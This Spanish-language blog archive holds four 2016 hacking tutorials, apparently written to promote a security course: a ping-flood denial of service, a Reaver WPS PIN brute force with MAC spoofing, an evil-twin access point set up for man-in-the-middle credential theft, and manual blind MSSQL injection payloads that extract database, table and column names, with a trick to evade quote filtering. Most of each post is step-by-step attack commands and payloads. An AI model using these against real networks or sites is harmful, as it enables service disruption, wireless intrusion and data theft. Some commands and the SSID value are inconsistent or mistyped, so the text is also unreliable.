Saturday, 30 July 2016
¿QUÉ ES UN ATAQUE DOS DE PING FLOODING?
01:07
No comments
Un DoS
(Denegación de Servicio) es un intento de hacer que los recursos de un
ordenador no estén disponibles para su usuario. Cuando no hay seguridad
perimetral, un ataque DoS pueda desactivar un ordenador y sus redes si se
planea y ejecuta cuidadosamente. Se puede montar desde cualquier parte, en
cualquier momento de todas maneras según expertos de seguridad en redes.
Por lo
general, un atacante no usa su propio ordenador. Se crearía lo que se llamado
Botnet. De esta manera, el hacker puede controlar varios ordenadores de forma
anónima para atacar un objetivo para derribarlo seguridad perimetral. El atacante también podría
utilizar Tunneling y IP Spoofing para camuflar su identidad y evitar cualquier
mecanismo de seguridad en redes.
¿QUÉ ES UN PING FLOODING?
En este
tutorial vamos a centrarnos en un tipo de ataque llamado Ping flood con ayuda
de expertos de seguridad en redes. Ping flooding es la forma más
primitiva de ataques DoS, porque cualquiera puede hacerlo muy fácilmente.
Cuando un equipo objetivo se encuentra bajo un ataque de ping flood, lo que
sucede es la red del ordenador se falla, tratando de mantenerse con las
solicitudes de ping. Sin mecanismo de seguridad perimetral, cada vez que el
servidor recibe una solicitud de ping tiene que calcularla y a continuación,
enviar una respuesta con la misma cantidad de datos. Ping flooding es cuando el
atacante inunda el servidor con solicitudes de ping y el servidor tiene que
calcular toneladas de peticiones de cada fracción de segundo, lo cual ocupa una
gran cantidad de recursos.
Cuando
haces ping flooding desde tu propio ordenador, estarías básicamente atacándote
a ti mismo también a menos que uses IP Spoofing según expertos de seguridad en
redes.
PING FLOODING
En este
tutorial se te enseñara este tipo de ataques DoS:
§ Targeted local disclosed
ping flood (IP Addy)
§ Router disclosed ping
flood
§ Blind ping flood
(Unknown IP Addy)
TARGETED LOCAL DISCLOSED PING FLOOD
Un
ataque Targeted
local disclosed ping flood es
cuando no hay seguridad perimetral y se conoce la dirección IP del destino
conectado a la red y se ataca directamente.
Muy
bien, por lo que desea hacer ping flood a un solo equipo. En primer lugar
tenemos que asegurarnos de que estamos conectados a él, inicia control de
comandos y escribe:
ipconfig
Lo que estamos
buscando es una dirección IP local que nosotros podamos atacar. Busca un
registro llamado IPv4 Address.
Vamos a
atacar directamente al blanco, entonces ve a la otra PC y abre el control
de comando y escribe esto allí:
ping
*ip address here* -t -l 65500
Utilice
la dirección IP que ha anotado desde el otro PC y sustituye *ipaddresshere *
con esa dirección IP. Verás que está haciendo ping al equipo que has
especificado explica experto de seguridad en redes. Ahora esta hacienda ataque
de ping flooding.
Para
entender correctamente el comando aquí está el argumento desglosado: El -t
especifica que se mantiene haciendo ping al blanco hasta que se acaba el tiempo
(o se desconecta hasta que lo detengas). -l especifica la información que
quieres enviar, por lo que estamos enviando 65500 bytes al blanco cada ping.
Esa es una gran cantidad de datos a gestionar, el tamaño habitual de ping por
defecto es de 32 bytes.
Si se
echa un vistazo en el PC que está siendo atacada, notarás un aumento bastante
significativo en la actividad y disminuicion de la velocidad.
ROUTER DISCLOSED PING FLOOD
Un
router disclosed ping flood tiene los mismos fundamentos como objetivo uno,
excepto que tu apuntas a los routers y no una computadora. Cuando haces ping
flood a un router tú pones en peligro la red que lo está alojando. Si hay unos
20 ordenadores conectados a un router sin seguridad perimetral y el router es
bajo ataque DoS, los 20 equipos no serán capaces de comunicarse entre sí o con
el router.
Tiene
el mismo procedimiento que el target flood, excepto que necesita saber la
dirección IP interna del router. Abre el indicador de comando y escribe:
ipconfig
Necesitamos
la Default Gateway, esta es la dirección IP local del router.
ping
192.168.1.1 -t -l 65500
Cuando
ejecute este comando, verás la pantalla de comandos ahora haciendo ping al
router con 65500 bytes cada ping. Cuando el objetivo es un ordenador en una red
a través de un switch o router, en general, el router / switch se llevará la
peor parte del ataque y podría hacer que se caiga, lo que resulta en un
restablecimiento completo acuerdo a experto de seguridad en redes.
BLIND PING FLOOD
Un
ataque ciego de cualquier tipo es cuando el atacante no conoce la dirección IP
de su objetivo y usa las técnicas para descubrir a través de programas
externos. Nosotros vamos a usar Cain y Abel para recuperar una lista de
direcciones IP. Usted puede aprender más sobre esto en el curso de seguridad en
redes y seguridad perimetral.
Saturday, 23 July 2016
HACKEAR LA CONTRASEÑA DE WPA WIFI / WPA2 USANDO REAVER SIN LISTA DE PALABRAS
05:20
No comments
Reaver-WPS desempeña
un ataque de fuerza bruta contra el número de pin de WiFi de un punto de
acceso. Una vez encontrado el pin de WPS, WPA PSK se puede recuperar y
alternativamente la configuración inalámbrica de AP puede ser reconfigurada.
Con ayuda de profesores de curso de seguridad en redes y ethical hacking describimos los pasos
y los comandos que ayudan al cracking las contraseñas WPA Wifi / WPA2
utilizando Reaver-WPS.
Reaver-wps enfoca
sobre la funcionalidad de registro externo exigido por la especificación de la
configuración de Wi-Fi protegida. Los puntos de acceso proporcionarán
registradores autenticados con su configuración inalámbrica actual (incluyendo
la WPA PSK), y también aceptan una nueva configuración del registrador.
Con el fin de
autenticar como registrador, el registrador debe demostrar su conocimiento del
número de PIN de 8 dígitos de la AP. Los registradores podrán autenticarse en
un punto de acceso en cualquier momento y sin interacción con el usuario. Dado
que el protocolo WPS se lleva a cabo sobre EAP, el registrador sólo tiene que
estar asociado con el AP y no necesita ningún conocimiento previo de la
encriptación o la configuración inalámbrica explica el profesor de curso de seguridad en redes y
ethical hacking.
Reaver-WPS desempeña
un ataque de fuerza bruta contra la AP, intentando todas las combinaciones
posibles con el fin de adivinar el número PIN de 8 dígitos de la AP. Dado que
el número de pines son totalmente numéricos, hay 10 ^ 8 (100.000.000) valores
posibles para cualquier número de pin dado. Según experto de ethical hacking,
el último dígito del pin es un valor de suma de control que puede ser calculada
en base a los 7 dígitos anteriores, que el espacio clave se reduce a 10 ^ 7
(10, 000,000) valores posibles.
Otro factor que afecta
la seguridad en redes es la longitud de la clave. Longitud de claves se reduce
aún más debido al hecho de que el protocolo de autenticación WPS corta el pin
en medio y valida cada medio individual. Eso significa que hay 10 ^ 4 (10.000)
valores posibles para la primera mitad del pin y 10 ^ 3 (1000) valores posibles
para la segunda mitad del pin, con el último dígito del pin siendo una suma de
comprobación.
Reaver-WPS adivina la
primera mitad del pin y luego la segunda mitad del pin, lo que significa que
todo la longitud de clave para el número PIN WPS puede agotarse en 11.000
intentos. Estadísticamente, sólo tendrá la mitad de ese tiempo con el fin de
adivinar el número PIN correcto. Vamos a ver cómo configurar e instalar
Reaver-WPS con ayuda de profesores de curso de seguridad en redes y ethical
hacking.
INSTALACIÓN:
Instalar Linux Kali,
todo construido en él. (Reaver-WPS, libpcap y libsqlite3)
USO:
Generalmente los
únicos argumentos necesarios para Reaver-WPS son el nombre de la interfaz y el
BSSID del AP objetivo:
# reaver -i mon0 -b 00:01:02:03:04:05
El canal y el SSID del
AP objetivo serán identificados automáticamente por Reaver-WPS, salvo que se
especifique explícitamente en la línea de comandos:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e
linksys
Por defecto, si el
punto de acceso cambia de canal, Reaver-WPS también cambiar su canal en
consecuencia. Sin embargo, esta función puede ser desactivada mediante la
fijación del canal de la interfaz explica experto de ethical hacking:
# reaver -i mon0 -b 00:01:02:03:04:05 –fixed
La recepción
predeterminada del tiempo de espera es de 5 segundos. Este período de tiempo de
espera se puede ajustar manualmente si es necesario.
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
El período de demora
predeterminado entre los intentos del pin es de 1 segundo. Este valor puede ser
aumentado o disminuido a cualquier valor entero no negativo. Un valor de cero
significa que no hay retraso:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Algunas APs bloquearán
temporalmente su estado WPS, por lo general durante cinco minutos o menos,
cuando se detecte actividad “sospechosa”. De forma predeterminada cuando se
detecte un estado bloqueado, Reaver-WPS comprobara el estado cada 315 segundos
y no continuara ataques de fuerza bruta al pin hasta que el estado WPS este
desbloqueado. Según profesores de curso de seguridad en redes y ethical
hacking, esta comprobación puede ser aumentada o disminuida a cualquier valor
no negativo:
# reaver -i mon0 -b 00:01:02:03:04:05
–lock-delay=250
Para un resultado
adicional, la opción verbose puede ser proporcionada. Proporcionando la verbose
dos veces aumentará la verbosidad y mostrará cada número del pin, ya que se intenta:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
El período de tiempo
de espera predeterminado para la recepción de los mensajes de respuesta M5 y M7
WPS es .1 segundo. Este período de tiempo de espera se puede ajustar
manualmente si es necesario (tiempo de espera máximo es de 1 segundo):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Aunque la mayoría de
AP no les importa, el envío de un mensaje de EAP FAIL para cerrar una sesión
WPS. Por defecto esta función está desactivada, pero se puede habilitar para
aquellas AP que lo necesitan:
# reaver -i mon0 -b 00:01:02:03:04:05
–eap-terminate
En primer lugar,
asegúrese de que su tarjeta inalámbrica está en modo monitor:
# airmon-ng start wlan0
Para ejecutar Reaver,
debe especificar el BSSID del AP objetivo y el nombre de la interfaz en modo
monitor (por lo general ‘mon0’, no ‘wlan0’, aunque esto puede variar en función
de la tarjeta inalámbrica / controladores):
# reaver -i mon0 -b 00:01:02:03:04:05
Es probable que
también desee utilizar -vv para obtener información verbose sobre progreso de
Reaver:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
ACELERANDO
EL ATAQUE
De forma
predeterminada, Reaver-WPS tiene un retardo de 1 segundo entre los intentos del
pin. Puede deshabilitar este retraso añadiendo ‘-d 0’ en la línea de comandos,
pero a algunas AP podría no gustarle menciona el profesor de curso de seguridad
en redes y ethical hacking:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Otra opción que puede
acelerar un ataque es -dh-small. Esta opción indica a Reaver para utilizar un
pequeño número secreto diffie-Hellman con el fin de reducir la carga
computacional en la AP objetivo:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
–dh-small
SUPLANTACIÓN
DE MAC
En algunos casos es
posible que se desee / necesite suplantar tu dirección MAC. Reaver es
compatible con Suplantación de MAC con la opción -mac, pero hay que asegurarse de
que ha falsificado su MAC correctamente con el fin de que funcione.
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
–mac=00:BA:AD:BE:EF:69
Controladores
inalámbricos compatibles
Los siguientes
controladores inalámbricos han sido probados o reportados para trabajar con
éxito con Reaver-WPS:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
SÓLO
DE FORMA PARCIAL
Los siguientes
controladores inalámbricos han tenido un éxito relativo, y pueden o no pueden
trabajar en función de su tarjeta inalámbrica
ath5k
iwlagn
rtl2800usb
b43
CONCLUSIÓN
Si desea Pentest o
Hackear sus contraseñas Wifi, entonces lo primero que se necesita es una
tarjeta Wi-Fi compatible. Durante el curso de seguridad en redes y ethical
hacking, tu tendrás la oportunidad de aprender a PenTest o hackear contraseñas
Wifi, cómo inyectar, falsificar, configurar una AP falsa o Honeypot.
Wednesday, 20 July 2016
¿CÓMO HACER UN ATAQUE EVIL TWIN PARA OBTENER INFORMACIÓN PERSONAL?
06:17
No comments
La idea es la creación
de tu propia red inalámbrica que se vea exactamente como la que usted está
atacando. Acuerdo con los profesionales de ethical hacking, las computadoras no
van a diferenciar entre los SSID´s que comparten el mismo nombre. En cambio, para
visualizar únicamente el que tiene la señal de conexión más fuerte. El objetivo
es que la víctima se conecte a su red falsificada y ejecute un
man-in-the-middle (MITM) y enviar sus datos a la Internet sin que él jamás
sospeche nada. Según curso de ciberseguridad, esto puede ser usado para robar
credenciales de alguien o DNS falsas por lo que la víctima visitara un sitio de
phishing, y ¡muchos más!
HARDWARE
/ SOFTWARE NECESARIOS:
Un adaptador inalámbrico
compatible TL-WN722N.
Kali Linux – Puedes ejecutar el comando a partir de
una USB o una VM.
Una forma alternativa de conectarse a Internet – La tarjeta que
está utilizando va a estar ocupado y por lo tanto no se puede conectar a
internet. Usted necesitará una forma de conectarse, de manera que se transmita
la información de la víctima sucesivamente. Según recomendación de experto de ethical
hacking, es
posible utilizar un adaptador inalámbrico por separado, conexión 3G / módem o
una conexión Ethernet a una red.
PASOS:
1.
Instalar el software que también establecerá nuestro servicio de
DHCP.
2.
Instalar algún software que falsifique la AP.
3.
Editar los archivos .conf para conseguir nuestra red pasando.
4.
Iniciar los servicios.
5.
Ejecutar los ataques.
–
CONFIGURACIÓN
DEL ADAPTADOR INALÁMBRICO
Esto va a suponer que usted está ejecutando Kali desde una
máquina virtual en Virtual Box.
Según el curso de ciberseguridad, en
primer lugar, conecte el adaptador inalámbrico en uno de los puertos USB.
En segundo lugar, si ya está ejecutando Kali, apáguelo. Abra
virtual Box y vaya a la configuración de la VM.
A continuación, haga clic en “Red” y seleccione la ficha
Adaptador 2.
Haga clic en “Habilitar adaptador de red ‘y luego seleccione’
Adaptador puenteado ‘
A continuación, haga clic en el nombre y seleccione el adaptador
inalámbrico.
Haga clic en Aceptar y
luego arrancar en su VM.
Escriba su nombre de usuario y contraseña e iniciar sesión. El
valor por defecto es root / Toor.
Según experto de ethical hacking Mike Dens, aquí viene la parte
difícil. Hemos establecido Kali para utilizar el adaptador inalámbrico como una
NIC, pero a la VM, el adaptador inalámbrico no se ha conectado todavía.
Ahora en la máquina virtual, vaya a la parte superior y haga
clic en “Dispositivos”, seleccione “Dispositivos USB”, y, finalmente, haga clic
en el adaptador inalámbrico.
A veces, cuando seleccionamos el dispositivo USB, no se carga
correctamente en la máquina virtual. Según el curso
de ciberseguridad que
si usted está teniendo problemas para conseguir Kali para reconocer el
adaptador inalámbrico, intente desactivar los puertos USB. Es posible que tenga
que probar varios antes de que funcione.
DNSMASQ
Abre una terminal.
Teclear el comando:
apt-get install -y
hostapd dnsmasq wireless-tools iw wvdial
Esto instalará todo el software necesario.
Ahora, vamos a configurar dnsmasq para servir a DHCP y DNS en su
interfaz inalámbrica e iniciar el servicio
Voy a pasar por este
paso a paso para que pueda ver qué es exactamente lo que está sucediendo:
cat <<EOF >
etc/dnsmasq.conf – Esto
le indica a la computadora para tomar todo lo que vamos a escribir e insertarlo
en el archivo /etc/dnsmaq.conf.
log-facility=var/log/dnsmasq.log – Esto le indica al ordenador dónde debe
poner todos los registros de que este programa podría generar.
#address=/#/10.0.0.1 – – es un comentario diciendo que vamos a
utilizar la red 10.0.0.0/24.
interface=wlan0 – le dice al ordenador cual NIC vamos a
utilizar para el DNS y el servicio DHCP.
dhcp-range=10.0.0.10,10.0.0.250,12h – Esto le indica a la computadora que rango
de direcciones IP nosotros deseamos asignar a las personas..
service dnsmasq start – inicia el servicio dnsmasq.
–
CONFIGURACIÓN
DEL PUNTO DE ACCESO INALÁMBRICO
Vamos a configurar una red con un SSID de ‘linksys’.
ifconfig wlan0 up – Esto confirma que nuestra interfaz wlan0
está trabajando explica experto
de ethical hacking.
ifconfig wlan0
10.0.0.1/24 –
Establece la interfaz wlan0 con la dirección IP 10.0.0.1 en el rango de
dirección privada de clase C.
iptables -t nat -A
POSTROUTING -o pp0 -j MASQUERADE – – Esto le indica a la computadora cómo
vamos a encaminar la información según curso de ciberseguridad.
iptables -A FORWARD -i
wlan0 -o ppp0 -j ACCEPT – Esto
le dice al equipo que vamos a encaminar los datos de wlan0 para ppp0.
echo ‘1’ >
/proc/sys/net/ipv4/ip_forward – Esto
se suma el número 1 al archivo ip_forward que le dice al equipo que queremos
que transmita la información.
cat <<EOF >
/etc/hostapd/hostapd.conf – Una
vez más, esto le dice al equipo que lo siguiente que escribimos queremos añadir
al archivo hostapd.conf.
interface=wlan0 – le dice al ordenador qué interfaz queremos
usar.
driver=nl80211 – le dice al ordenador que operador debe
utilizar para la interfaz.
ssid=Freewifi – Esto le indica a la computadora que
quieres el SSID sea, el nuestro es linksy.
service hostapd start – Arranca el servicio
En este punto, usted debe ser capaz de buscar, ya sea con su
teléfono u ordenador portátil, y encontrar el punto de acceso inalámbrico Rojo.
A partir de aquí, usted debería ser capaz de comenzar a realizar
todo tipo de trucos sucios, ataques MITM, la detección de paquetes, sacar
contraseñas, etc. Según expertos de experto de ethical hacking y
ciberseguridad, un buen programa de MITM es Ettercap. Pueden aprender más sobre
este ataque durante el curso de ciberseguridad.
Monday, 18 July 2016
¿CÓMO HACKEAR USANDO BLIND SQL INYECCIÓN
00:19
No comments
En este tutorial usted aprenderá cómo
realizar y explotar la inyección de Blind SQL paso a paso de forma manual
con ayuda de expertos de seguridad de aplicaciones web y seguridad en base de datos.
¿QUÉ
ES INYECCIÓN DE BLIND SQL?
Según
el curso de seguridad en base de datos, Inyección de Blind SQL es un tipo de
ataque de inyección SQL que hace las consultas de verdadero o falso a la base
de datos y determina la respuesta basándose en la respuesta de las
aplicaciones.
En
algunos casos, el uso normal de inyección SQL no sirve. La inyección Blind sql
es otro método que puede ayudarte. El punto importante en la inyección de blind
sql es la diferencia entre el resultado de la consulta válido y no válido.
Usted tiene que inyectar un comando que deje una consulta válida o inválida y
observar la respuesta menciona expertos de seguridad de aplicaciones web.
¿CÓMO
PROBAR INYECCIÓN DE BLIND SQL EN UNA APLICACIÓN?
Permitámonos
suponer que http://www.example.com/page.asp?id=1 es una dirección URL normal de
la página web. Por lo que permite comprobar la vulnerabilidad de la página web
mediante el uso de condiciones verdaderas y falsas como 1 = 2, 1 = 1 o 0> 1.
http://www.example.com/page.asp?id=1
and 1=1 (True)http://www.example.com/page.asp?id=1 and 1=2
(False)http://www.example.com/page.asp?id=1 and 0>1 (False)
Si los
resultados de estas consultas son diferentes, será una buena señal. Eso
significa que el sitio web es vulnerable a inyección de blindmssql SQL. Cuando
se pone “id = 1 and 1 = 1”, significa que la condición es verdadera, así la
respuesta debe ser normal. Sin embargo, el parámetro “id = 1 and 1 = 2” indica
que la condición es falsa y si el administrador no proporciona un filtro
adecuado, la respuesta difiere absolutamente de la anterior.
LA
EXTRACCIÓN DE DATOS A TRAVÉS DE INYECCIÓN DE BLIND SQL
Mediante
el uso de esta base de datos se puede extraer, pero hay que pasar más tiempo en
eso. Usted conseguirá un único carácter de la palabra mediante la ejecución de
las algunas consultas.
El
experto de seguridad de aplicaciones web explica un ejemplo de la consulta el
primer carácter del nombre de la base de datos. Suponemos que el nombre de la
base de datos es member. Por lo tanto, el primer carácter es “m”, que es el
valor ascıı 109. (En este punto, se supone que conoce el código ascıı).
Ok, en
primer lugar, tenemos que saber que los resultados de las solicitudes tienen
sólo 2 formas.
Los
siguientes pasos son dependiendo de cada persona. Tu idea puede ser diferente
de nuestra idea con el fin de recoger el código ascii de consulta de prueba.
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>90
En esta
situación, el resultado será el resultado de la consulta válida como
http://www.example.com/page.asp?id=1
and 1=1
(Debido
a que el primer carácter del nombre de la base de datos es “m”, que es el
código ascii 109). A continuación, tratamos
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>120
Sin
duda, es que el resultado será como
http://www.example.com/page.asp?id=1
y 1 = 2 (porque
109 absolutamente menos de 120).
A
continuación, vamos a tratar,
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>105
El
resultado es un resultado de la consulta válida y en este punto, el valor ascii
del primer carácter del nombre de la base es de entre 105 y 120.
Por lo
tanto, tratamos
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>112 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT
LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT
LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query
result http://www.example.com/page.asp?id=1 AND
ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>109 ===> invalid query result
Usted
puede ver que el primer carácter del nombre de base de datos tiene un valor
ascii mayor que 108, pero no es mayor que 109. Por lo tanto, podemos concluir
que el valor ascıı es igual a 109.
Se
puede probar con:
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)=109
Estamos
seguros de que el resultado es como el resultado de http://www.target.com/page.php?id=1
and 1=1
Lo
demás que tienes que hacer es manipular algunas consultas para recoger su
información preferida.
En este
tutorial, el experto de seguridad en base de datos se proponen algunas consultas
de ejemplo con el fin de encontrar los nombres de tablas y columnas de la base
de datos.
LA EXTRACCIÓN DE NOMBRES DE TABLA A
TRAVÉS DE INYECCIÓN DE BLINDMSSQL SQL
Con el
fin de obtener el nombre de tabla, podemos utilizar el método anterior para
obtener cada carácter del nombre de la tabla. Lo único que tenemos que hacer es
cambiar la consulta para recuperar el nombre de tabla de base de datos actual.
Como MSSQL no tiene comando de limit. Por lo tanto, la consulta es un poco
complicada.
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE
xtYpe=0x55)) AS varchar(8000)),1,1)),0)>97
La
consulta anterior se utiliza para determinar el primer carácter de primera
tabla en la base de datos actual. Si queremos encontrar segundo carácter de la
primera tabla, podemos hacerlo mediante siguiente consulta:
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE
xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97
Cambiamos
el segundo parámetro de la función del substring desde 1 hasta 2 con el fin de
especificar la posición preferida del personaje en nombre de la tabla.
Por lo
tanto, si queremos determinar otros puntos, nosotros sólo necesitamos cambiar
segundo parámetro de la función del
substring menciona experto de seguridad en base de datos.
En el
caso de otras tablas, podemos encontrar otros nombres de tabla cambiando la
segunda De “SELECT TOP 1” a ser “SELECT TOP 2”, “SELECT TOP 3” y así
sucesivamente.
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE
xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97
La extracción de nombres de columna a través de inyección de
BlindMssql SQL
Después
obtenemos los nombres de tabla, la siguiente información de objetivo son
absolutamente los nombres de las columnas.
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT
COUNT(i.colid)rid FROM syscolumns i HERE(i.colid<=o.colid) AND id=(SELECT id
FROM sysobjects WHERE name=’tablename’))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name=’tablename’)) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97
Con el
fin de eludir el filtrado de magic quote, usted tiene que cambiar “tablename”
que es la forma de concatenar comandos char (). Por ejemplo, si el nombre de
tabla es “user”, cuando ponemos “user” en la consulta, “puede ser filtrado y
nuestra consulta será incorrecta. Según los expertos de seguridad
de aplicaciones web, la solución es convertir
‘user’ es
char(117)+char(115)+char(101)+char(114).
Por lo tanto,
la consulta en la cláusula where cambia de
“Where
name=’user’” to “Where name=char(117)+char(115)+char(101)+char(114)”.
En este
caso, podemos evitar el filtrado de magic quote. El resultado de la solicitud
anterior es el primer carácter del nombre de la primera columna de la tabla
específica.
Según
curso de seguridad en base de datos, cuando queremos encontrar el segundo
carácter de la primera columna, podemos utilizar el mismo método que conseguir
nombre de la tabla, cambiando el segundo parámetro de la función del substring.
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT
COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT
id FROM sysobjects WHERE name=’tablename’))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name=’tablename’)) as p WHERE(p.x=1))AS
varchar(8000)),2,1)),0)>97
La
solicitud anterior se utiliza para determinar el segundo carácter de la primera
columna de la tabla nombre específico.
Según
los expertos de seguridad de aplicaciones web, en el caso de la determinación de otras
columnas, podemos hacerlo cambiando el valor p.x de 1 a 2,3,4 y así
sucesivamente. como,
http://www.example.com/page.asp?id=1
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT
COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT
id FROM sysobjects WHERE name=’tablename’))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name=’tablename’)) as p WHERE(p.x=2))AS
varchar(8000)),1,1)),0)>97
El
primer carácter del segundo nombre de la columna en la tabla específica puede
ser determinado por la consulta anterior. Pueden aprender más sobre inyección
de Blind SQL durante la capacitación de seguridad de aplicaciones web o
seguridad en base de datos.